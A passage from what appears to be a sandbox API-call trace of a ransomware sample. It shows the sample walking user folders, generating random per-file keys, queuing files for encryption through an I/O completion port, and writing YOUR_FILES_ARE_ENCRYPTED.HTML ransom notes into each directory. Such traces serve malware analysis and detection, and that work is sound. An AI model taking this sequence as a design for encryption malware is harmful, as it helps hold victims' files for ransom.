lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.512] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=67302) returned 1 [0123.512] GetProcessHeap () returned 0x600000 [0123.512] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.515] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="5B") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="14") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="25") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CD") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="85") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="8A") returned 2 [0123.516] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="EC") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="BC") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="8A") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="3F") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="5B") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="AC") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="F0") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5A") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="AF") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="B0") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F9") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="39") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C2") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="4B") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="A3") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="46") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C7") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="CD") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="BE") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="4C") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="56") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="53") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="8C") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CB") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="30") returned 2 [0123.516] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0C") returned 2 [0123.517] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx" [0123.517] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.517] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.521] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f3fdfd0, ftCreationTime.dwHighDateTime=0x1d70a6f, ftLastAccessTime.dwLowDateTime=0xfa497080, ftLastAccessTime.dwHighDateTime=0x1d70a74, ftLastWriteTime.dwLowDateTime=0xfa497080, ftLastWriteTime.dwHighDateTime=0x1d70a74, nFileSizeHigh=0x0, nFileSizeLow=0x106e6, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="ZxYvlelUIPHgzj.docx", cAlternateFileName="ZXYVLE~1.DOC")) returned 0 [0123.521] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0123.521] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0123.521] GetProcessHeap () returned 0x600000 [0123.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0123.523] WriteFile (in: hFile=0x304, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0123.524] CloseHandle (hObject=0x304) returned 1 [0123.524] GetProcessHeap () returned 0x600000 [0123.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.524] GetProcessHeap () returned 0x600000 [0123.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0123.525] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x532a71a5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x532a71a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="Roaming", cAlternateFileName="")) returned 0 [0123.525] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0123.526] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0123.526] GetProcessHeap () returned 0x600000 [0123.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0123.527] WriteFile (in: hFile=0x314, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0123.528] CloseHandle (hObject=0x314) returned 1 [0123.528] GetProcessHeap () returned 0x600000 [0123.528] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.528] GetProcessHeap () returned 0x600000 [0123.528] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0123.528] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0123.529] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.529] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data") returned 42 [0123.529] GetProcessHeap () returned 0x600000 [0123.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0123.530] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data" [0123.530] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data\\*" [0123.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Application Data\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x532a71a5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x532a71a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="Roaming", cAlternateFileName="翿")) returned 0xffffffff [0123.530] GetProcessHeap () returned 0x600000 [0123.530] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0123.530] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Contacts", cAlternateFileName="")) returned 1 [0123.530] StrStrIW (lpFirst="Contacts", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.530] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts") returned 34 [0123.530] GetProcessHeap () returned 0x600000 [0123.530] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0123.530] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts" [0123.530] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\*" [0123.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.530] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0123.530] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0123.530] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.530] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini") returned 46 [0123.531] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.531] lstrlenW (lpString=".ini") returned 4 [0123.531] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.531] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0123.531] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=412) returned 1 [0123.532] CloseHandle (hObject=0x304) returned 1 [0123.532] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0123.532] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.532] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0123.532] GetProcessHeap () returned 0x600000 [0123.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0123.533] WriteFile (in: hFile=0x314, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0123.534] CloseHandle (hObject=0x314) returned 1 [0123.534] GetProcessHeap () returned 0x600000 [0123.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.534] GetProcessHeap () returned 0x600000 [0123.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0123.535] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Cookies", cAlternateFileName="")) returned 1 [0123.535] StrStrIW (lpFirst="Cookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.535] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies") returned 33 [0123.535] GetProcessHeap () returned 0x600000 [0123.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0123.535] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies" [0123.535] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies\\*" [0123.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Cookies\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="翿")) returned 0xffffffff [0123.536] GetProcessHeap () returned 0x600000 [0123.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0123.536] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8e764dfa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e764dfa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Desktop", cAlternateFileName="")) returned 1 [0123.536] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.536] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 33 [0123.536] GetProcessHeap () returned 0x600000 [0123.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0123.536] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop" [0123.536] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\*" [0123.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8e764dfa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e764dfa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0123.536] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8e764dfa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e764dfa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0123.536] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b85d3c0, ftCreationTime.dwHighDateTime=0x1d70a1c, ftLastAccessTime.dwLowDateTime=0x13d52ed0, ftLastAccessTime.dwHighDateTime=0x1d70a62, ftLastWriteTime.dwLowDateTime=0x13d52ed0, ftLastWriteTime.dwHighDateTime=0x1d70a62, nFileSizeHigh=0x0, nFileSizeLow=0x16227, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="-cmSiqdrXi0V3j.png", cAlternateFileName="-CMSIQ~1.PNG")) returned 1 [0123.536] StrStrIW (lpFirst="-cmSiqdrXi0V3j.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.536] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png") returned 52 [0123.536] PathFindExtensionW (pszPath="-cmSiqdrXi0V3j.png") returned=".png" [0123.536] lstrlenW (lpString=".png") returned 4 [0123.536] PathFindExtensionW (pszPath="-cmSiqdrXi0V3j.png") returned=".png" [0123.536] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\-cmsiqdrxi0v3j.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0123.539] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=90663) returned 1 [0123.539] GetProcessHeap () returned 0x600000 [0123.539] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.542] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A7") returned 2 [0123.542] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="F4") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DD") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="69") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E1") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="1E") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="7C") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="0C") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="79") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="91") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="84") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="13") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="3F") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="47") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="46") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="53") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F4") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="65") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E5") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="78") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="9D") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="FC") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="09") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="82") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="3A") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="4E") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="B5") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="36") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="BE") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="DA") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="77") returned 2 [0123.542] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="1E") returned 2 [0123.543] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png" [0123.543] CreateIoCompletionPort (FileHandle=0x304, 